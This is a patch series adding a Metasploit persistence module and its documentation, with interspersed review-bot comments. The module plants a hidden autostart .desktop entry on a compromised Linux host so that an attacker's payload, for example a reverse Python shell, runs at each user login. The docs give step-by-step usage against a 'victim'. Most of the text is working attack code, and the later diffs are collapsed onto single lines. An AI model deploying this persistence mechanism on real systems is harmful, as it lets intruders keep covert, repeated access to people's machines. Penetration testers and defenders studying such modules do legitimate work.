From 6b4870389db4069efb2ecb6745e67de72c1073a7 Mon Sep 17 00:00:00 2001
From: Eliott Teissonniere <10683430+DeveloppSoft@users.noreply.github.com>
Date: Sun, 15 Jul 2018 12:01:30 +0200
Subject: [PATCH 01/10] Add autostart module
---
.../linux/local/autostart_persistence.rb | 60 +++++++++++++++++++
1 file changed, 60 insertions(+)
create mode 100644 modules/exploits/linux/local/autostart_persistence.rb
diff --git a/modules/exploits/linux/local/autostart_persistence.rb b/modules/exploits/linux/local/autostart_persistence.rb
new file mode 100644
index 0000000000..48fff07719
--- /dev/null
+++ b/modules/exploits/linux/local/autostart_persistence.rb
@@ -0,0 +1,60 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+ Rank = ExcellentRanking
+
+ include Msf::Post::File
+ include Msf::Post::Unix
+ include Msf::Exploit::FileDropper
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Autostart Desktop Item Persistence',
+ 'Description' => %q(
+ This module will create an autostart entry to execute a payload.
+ ),
+ 'License' => MSF_LICENSE,
+ 'Author' => [ 'Eliott Teissonniere' ],
+ 'Platform' => [ 'unix', 'linux' ],
+ 'Arch' => ARCH_CMD,
+ 'Payload' => {
+ 'BadChars' => '#%\n"',
+ 'Compat' => {
+ 'PayloadType' => 'cmd',
+ 'RequiredCmd' => 'generic python netcat'
+ }
+ },
+ 'SessionTypes' => [ 'shell', 'meterpreter' ],
+ 'DefaultOptions' => { 'WfsDelay' => 0, 'DisablePayloadHandler' => 'true' },
+ 'DisclosureDate' => 'Feb 13 2006', # Date of the 0.5 doc for autostart
+ 'Targets' => [ ['Automatic', {}] ],
+ 'DefaultTarget' => 0
+ ))
+
+ register_options([ OptString.new('NAME', [false, 'Name of autostart entry' ]) ])
+ end
+
+ def exploit
+ name = datastore['NAME'] ? datastore['NAME'] : Rex::Text.rand_text_alpha(5)
+ vprint_status ("Name is #{name}")
+
+ vprint_status payload.encoded
+
+ home = cmd_exec('echo ~')
+
+ path = "#{home}/.config/autostart/#{name}.desktop"
+ print_status("Creating #{path}")
+
+ print_status('Making sure the autostart directory exists')
+ cmd_exec("mkdir -p #{home}/.config/autostart") # in case no autostart exists
+
+ print_status('Uploading autostart file')
+ cmd_exec("rm #{path}")
+
+ write_file(path, "[Desktop Entry]\nType=Application\nName=#{name}\nNoDisplay=true\nTerminal=false\nExec=/bin/sh -c \"#{payload.encoded}\"\n")
+ end
+end
+
From a22acf3f3eb2e87293a6e3a954b747008a578d7a Mon Sep 17 00:00:00 2001
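Review bot: In `exploit`, the operator-supplied `NAME` and the output of `echo ~` are interpolated unquoted into `cmd_exec("mkdir -p #{home}/.config/autostart")` and `cmd_exec("rm #{path}")`, so a name containing whitespace, `/` or shell metacharacters makes those commands act on something other than the intended autostart file on the assessed host. Reject such names before building the path, e.g. `fail_with(Failure::BadConfig, 'NAME may only contain letters, digits, _ . and -') unless name =~ /\A[\w.-]+\z/`, and quote the paths handed to the shell. The ternary also accepts an empty string if the datastore ever holds one, which would produce a file called `.desktop`; the `||` form in patch 09 of this series behaves the same way. `rm` additionally deletes whatever already sits at that path without checking what it is.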
From: Eliott Teissonniere <10683430+DeveloppSoft@users.noreply.github.com>
Date: Sun, 15 Jul 2018 12:02:52 +0200
Subject: [PATCH 02/10] Document autostart module
---
.../linux/local/autostart_persistence.md | 22 +++++++++++++++++++
1 file changed, 22 insertions(+)
create mode 100644 documentation/modules/exploit/linux/local/autostart_persistence.md
diff --git a/documentation/modules/exploit/linux/local/autostart_persistence.md b/documentation/modules/exploit/linux/local/autostart_persistence.md
new file mode 100644
index 0000000000..1b960aead4
--- /dev/null
+++ b/documentation/modules/exploit/linux/local/autostart_persistence.md
@@ -0,0 +1,22 @@
+## Autostart persistence
+
+This module persist a payload by creating a `.desktop` entry for Linux desktop targets.
+
+### Testing
+
+1. Exploit a box
+2. `use exploit/linux/local/autostart_persistence`
+3. `set SESSION `
+4. `set PAYLOAD cmd/unix/reverse_python` (for instance), configure the payload as needed
+5. `exploit`
+
+When the victim reboots your payload will be executed!
+
+
+### Options
+
+
+**NAME**
+
+Name of the `.desktop` entry to add, if not specified it will be chosen randomly.
+
From 9962cbebfde5446416b8089125da98c247061658 Mon Sep 17 00:00:00 2001
From: Eliott Teissonniere <10683430+DeveloppSoft@users.noreply.github.com>
Date: Sun, 15 Jul 2018 15:19:13 +0200
Subject: [PATCH 03/10] Support perl payload
---
modules/exploits/linux/local/autostart_persistence.rb | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/modules/exploits/linux/local/autostart_persistence.rb b/modules/exploits/linux/local/autostart_persistence.rb
index 48fff07719..300aa179c5 100644
--- a/modules/exploits/linux/local/autostart_persistence.rb
+++ b/modules/exploits/linux/local/autostart_persistence.rb
@@ -24,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Local 'BadChars' => '#%\n"', 'Compat' => { 'PayloadType' => 'cmd', - 'RequiredCmd' => 'generic python netcat' + 'RequiredCmd' => 'generic python netcat perl' } }, 'SessionTypes' => [ 'shell', 'meterpreter' ], From e4d6eb07ca90f7c7aaef2dda0eae20f5b1d408ed Mon Sep 17 00:00:00 2001 From: Eliott Teissonniere <10683430+DeveloppSoft@users.noreply.github.com> Date: Sun, 15 Jul 2018 15:19:46 +0200 Subject: [PATCH 04/10] Remove useless statement --- modules/exploits/linux/local/autostart_persistence.rb | 2 -- 1 file changed, 2 deletions(-) diff --git a/modules/exploits/linux/local/autostart_persistence.rb b/modules/exploits/linux/local/autostart_persistence.rb index 300aa179c5..914b1bd01c 100644 --- a/modules/exploits/linux/local/autostart_persistence.rb +++ b/modules/exploits/linux/local/autostart_persistence.rb @@ -41,8 +41,6 @@ class MetasploitModule < Msf::Exploit::Local name = datastore['NAME'] ? datastore['NAME'] : Rex::Text.rand_text_alpha(5) vprint_status ("Name is #{name}") - vprint_status payload.encoded - home = cmd_exec('echo ~') path = "#{home}/.config/autostart/#{name}.desktop" From c1d929f5fbef87e06edd4760e5d8e2418433609f Mon Sep 17 00:00:00 2001 From: Eliott Teissonniere <10683430+DeveloppSoft@users.noreply.github.com> Date: Sun, 15 Jul 2018 15:26:17 +0200 Subject: [PATCH 05/10] Use an HEREDOC for multiline string --- modules/exploits/linux/local/autostart_persistence.rb | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/modules/exploits/linux/local/autostart_persistence.rb b/modules/exploits/linux/local/autostart_persistence.rb index 914b1bd01c..0b5ed7750e 100644 --- a/modules/exploits/linux/local/autostart_persistence.rb +++ b/modules/exploits/linux/local/autostart_persistence.rb 
@@ -52,7 +52,14 @@ class MetasploitModule < Msf::Exploit::Local print_status('Uploading autostart file') cmd_exec("rm #{path}") - write_file(path, "[Desktop Entry]\nType=Application\nName=#{name}\nNoDisplay=true\nTerminal=false\nExec=/bin/sh -c \"#{payload.encoded}\"\n") + write_file(path, <<~HEREDOC + [Desktop Entry] + Type=Application + Name=#{name} + NoDisplay=true + Terminal=false + Exec=/bin/sh -c "#{payload.encoded}" + HEREDOC) end end From e82bde993f61284bf72742458621c53faa0b5017 Mon Sep 17 00:00:00 2001 From: Eliott Teissonniere <10683430+DeveloppSoft@users.noreply.github.com> Date: Sun, 15 Jul 2018 15:32:15 +0200 Subject: [PATCH 06/10] Cleanup indentation --- .../linux/local/autostart_persistence.rb | 114 +++++++++--------- 1 file changed, 57 insertions(+), 57 deletions(-) diff --git a/modules/exploits/linux/local/autostart_persistence.rb b/modules/exploits/linux/local/autostart_persistence.rb index 0b5ed7750e..fec187c18b 100644 --- a/modules/exploits/linux/local/autostart_persistence.rb +++ b/modules/exploits/linux/local/autostart_persistence.rb 
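Review bot: The closing line `HEREDOC)` is not a valid heredoc terminator, because Ruby ends a heredoc only on a line that holds the identifier alone, so as far as this hunk shows the call would not parse. The parenthesis belongs on the opening line, `write_file(path, <<~HEREDOC)`, with a bare `HEREDOC` as the last line. The squiggly `<<~` form also needs Ruby 2.3 or later, which matters if older interpreters are still supported. The enclosing `exploit` method starts outside this hunk.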
@@ -4,62 +4,62 @@ ## class MetasploitModule < Msf::Exploit::Local - Rank = ExcellentRanking - - include Msf::Post::File - include Msf::Post::Unix - include Msf::Exploit::FileDropper - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Autostart Desktop Item Persistence', - 'Description' => %q( - This module will create an autostart entry to execute a payload. - ), - 'License' => MSF_LICENSE, - 'Author' => [ 'Eliott Teissonniere' ], - 'Platform' => [ 'unix', 'linux' ], - 'Arch' => ARCH_CMD, - 'Payload' => { - 'BadChars' => '#%\n"', - 'Compat' => { - 'PayloadType' => 'cmd', - 'RequiredCmd' => 'generic python netcat perl' - } - }, - 'SessionTypes' => [ 'shell', 'meterpreter' ], - 'DefaultOptions' => { 'WfsDelay' => 0, 'DisablePayloadHandler' => 'true' }, - 'DisclosureDate' => 'Feb 13 2006', # Date of the 0.5 doc for autostart - 'Targets' => [ ['Automatic', {}] ], - 'DefaultTarget' => 0 - )) - - register_options([ OptString.new('NAME', [false, 'Name of autostart entry' ]) ]) - end - - def exploit - name = datastore['NAME'] ? datastore['NAME'] : Rex::Text.rand_text_alpha(5) - vprint_status ("Name is #{name}") - - home = cmd_exec('echo ~') - - path = "#{home}/.config/autostart/#{name}.desktop" - print_status("Creating #{path}") - - print_status('Making sure the autostart directory exists') - cmd_exec("mkdir -p #{home}/.config/autostart") # in case no autostart exists - - print_status('Uploading autostart file') - cmd_exec("rm #{path}") - - write_file(path, <<~HEREDOC - [Desktop Entry] - Type=Application - Name=#{name} - NoDisplay=true - Terminal=false - Exec=/bin/sh -c "#{payload.encoded}" - HEREDOC) - end + Rank = ExcellentRanking + + include Msf::Post::File + include Msf::Post::Unix + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Autostart Desktop Item Persistence', + 'Description' => %q( + This module will create an autostart entry to execute a payload. 
+ ), + 'License' => MSF_LICENSE, + 'Author' => [ 'Eliott Teissonniere' ], + 'Platform' => [ 'unix', 'linux' ], + 'Arch' => ARCH_CMD, + 'Payload' => { + 'BadChars' => '#%\n"', + 'Compat' => { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'generic python netcat perl' + } + }, + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'DefaultOptions' => { 'WfsDelay' => 0, 'DisablePayloadHandler' => 'true' }, + 'DisclosureDate' => 'Feb 13 2006', # Date of the 0.5 doc for autostart + 'Targets' => [ ['Automatic', {}] ], + 'DefaultTarget' => 0 + )) + + register_options([ OptString.new('NAME', [false, 'Name of autostart entry' ]) ]) + end + + def exploit + name = datastore['NAME'] ? datastore['NAME'] : Rex::Text.rand_text_alpha(5) + vprint_status ("Name is #{name}") + + home = cmd_exec('echo ~') + + path = "#{home}/.config/autostart/#{name}.desktop" + print_status("Creating #{path}") + + print_status('Making sure the autostart directory exists') + cmd_exec("mkdir -p #{home}/.config/autostart") # in case no autostart exists + + print_status('Uploading autostart file') + cmd_exec("rm #{path}") + + write_file(path, <<~HEREDOC + [Desktop Entry] + Type=Application + Name=#{name} + NoDisplay=true + Terminal=false + Exec=/bin/sh -c "#{payload.encoded}" + HEREDOC) + end end From fc234b09c2182d8191182eea09c388a13e1880bf Mon Sep 17 00:00:00 2001 From: Eliott Teissonniere <10683430+DeveloppSoft@users.noreply.github.com> Date: Sun, 15 Jul 2018 16:13:42 +0200 Subject: [PATCH 07/10] Fix HEREDOC not always supported --- .../linux/local/autostart_persistence.rb | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/modules/exploits/linux/local/autostart_persistence.rb b/modules/exploits/linux/local/autostart_persistence.rb index fec187c18b..29b07bdaf4 100644 --- a/modules/exploits/linux/local/autostart_persistence.rb +++ b/modules/exploits/linux/local/autostart_persistence.rb 
@@ -52,14 +52,14 @@ class MetasploitModule < Msf::Exploit::Local print_status('Uploading autostart file') cmd_exec("rm #{path}") - write_file(path, <<~HEREDOC - [Desktop Entry] - Type=Application - Name=#{name} - NoDisplay=true - Terminal=false - Exec=/bin/sh -c "#{payload.encoded}" - HEREDOC) + write_file(path, [ + "[Desktop Entry]", + "Type=Application", + "Name=#{name}", + "NoDisplay=true", + "Terminal=false", + "Exec=/bin/sh -c \"#{payload.encoded}\"" + ].join("\n")) end end From eb43e4c0bde14f1647677c0fd04091df00a09332 Mon Sep 17 00:00:00 2001 From: Eliott Teissonniere <10683430+DeveloppSoft@users.noreply.github.com> Date: Sun, 15 Jul 2018 16:47:27 +0200 Subject: [PATCH 08/10] Rework status printing --- modules/exploits/linux/local/autostart_persistence.rb | 5 +---- 1 file changed, 1 insertion(+), 4 deletions(-) diff --git a/modules/exploits/linux/local/autostart_persistence.rb b/modules/exploits/linux/local/autostart_persistence.rb index 29b07bdaf4..618491ba04 100644 --- a/modules/exploits/linux/local/autostart_persistence.rb +++ b/modules/exploits/linux/local/autostart_persistence.rb @@ -39,18 +39,15 @@ class MetasploitModule < Msf::Exploit::Local def exploit name = datastore['NAME'] ? datastore['NAME'] : Rex::Text.rand_text_alpha(5) - vprint_status ("Name is #{name}") home = cmd_exec('echo ~') path = "#{home}/.config/autostart/#{name}.desktop" - print_status("Creating #{path}") print_status('Making sure the autostart directory exists') cmd_exec("mkdir -p #{home}/.config/autostart") # in case no autostart exists - print_status('Uploading autostart file') - cmd_exec("rm #{path}") + print_status("Uploading autostart file #{path}") write_file(path, [ "[Desktop Entry]", From 63a58d337811eea815e4b93ddb244cb8126d097b Mon Sep 17 00:00:00 2001 
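Review bot: `].join("\n")` writes a file whose last line has no terminating newline, whereas both the heredoc it replaces and the one-line string from the first patch ended with one. If the change is not intended, restore it with `].join("\n") + "\n"`. The enclosing `exploit` method starts outside this hunk.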
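Review bot: With `cmd_exec("rm #{path}")` removed, `write_file` is the only operation on `path`, and nothing checks beforehand whether a file of that name already exists, so an operator-chosen `NAME` that matches an existing autostart entry would presumably replace the user's own file on the assessed host without warning. A guard before the write, such as `fail_with(Failure::BadConfig, "#{path} already exists") if exist?(path)`, avoids that (assuming `exist?` from `Msf::Post::File` is available in this framework version). The results of the `mkdir -p` call and of `write_file` are also ignored, so the status line can report an upload that did not happen.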
From: Eliott Teissonniere <10683430+DeveloppSoft@users.noreply.github.com> Date: Thu, 9 Aug 2018 10:23:19 +0200 Subject: [PATCH 09/10] Code style random name --- modules/exploits/linux/local/autostart_persistence.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/local/autostart_persistence.rb b/modules/exploits/linux/local/autostart_persistence.rb index 618491ba04..8ce69ab1f1 100644 --- a/modules/exploits/linux/local/autostart_persistence.rb +++ b/modules/exploits/linux/local/autostart_persistence.rb @@ -38,7 +38,7 @@ class MetasploitModule < Msf::Exploit::Local end def exploit - name = datastore['NAME'] ? datastore['NAME'] : Rex::Text.rand_text_alpha(5) + name = datastore['NAME'] || Rex::Text.rand_text_alpha(5) home = cmd_exec('echo ~') From 865898cba7252c28992d5043d1cf1c1692cccde9 Mon Sep 17 00:00:00 2001 From: Tim W Date: Mon, 20 Aug 2018 17:51:41 +0800 Subject: [PATCH 10/10] minor fixes --- .../modules/exploit/linux/local/autostart_persistence.md | 2 +- modules/exploits/linux/local/autostart_persistence.rb | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/documentation/modules/exploit/linux/local/autostart_persistence.md b/documentation/modules/exploit/linux/local/autostart_persistence.md index 1b960aead4..81f2e889f2 100644 --- a/documentation/modules/exploit/linux/local/autostart_persistence.md +++ b/documentation/modules/exploit/linux/local/autostart_persistence.md @@ -10,7 +10,7 @@ This module persist a payload by creating a `.desktop` entry for Linux desktop t 4. `set PAYLOAD cmd/unix/reverse_python` (for instance), configure the payload as needed 5. `exploit` -When the victim reboots your payload will be executed! +When the victim logs in your payload will be executed! ### Options diff --git a/modules/exploits/linux/local/autostart_persistence.rb b/modules/exploits/linux/local/autostart_persistence.rb index 8ce69ab1f1..7820bacf30 100644 --- a/modules/exploits/linux/local/autostart_persistence.rb 
+++ b/modules/exploits/linux/local/autostart_persistence.rb @@ -8,13 +8,13 @@ class MetasploitModule < Msf::Exploit::Local include Msf::Post::File include Msf::Post::Unix - include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Autostart Desktop Item Persistence', 'Description' => %q( This module will create an autostart entry to execute a payload. + The payload will be executed when the users logs in. ), 'License' => MSF_LICENSE, 'Author' => [ 'Eliott Teissonniere' ],
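Review bot: The added description line reads "when the users logs in" and should be `The payload will be executed when the user logs in.` With `Msf::Exploit::FileDropper` no longer included, nothing visible in this series removes the entry the module writes, so the description (and the module documentation) should also state that the file stays at `~/.config/autostart/<NAME>.desktop` until it is deleted by hand. `initialize` continues past the end of this hunk.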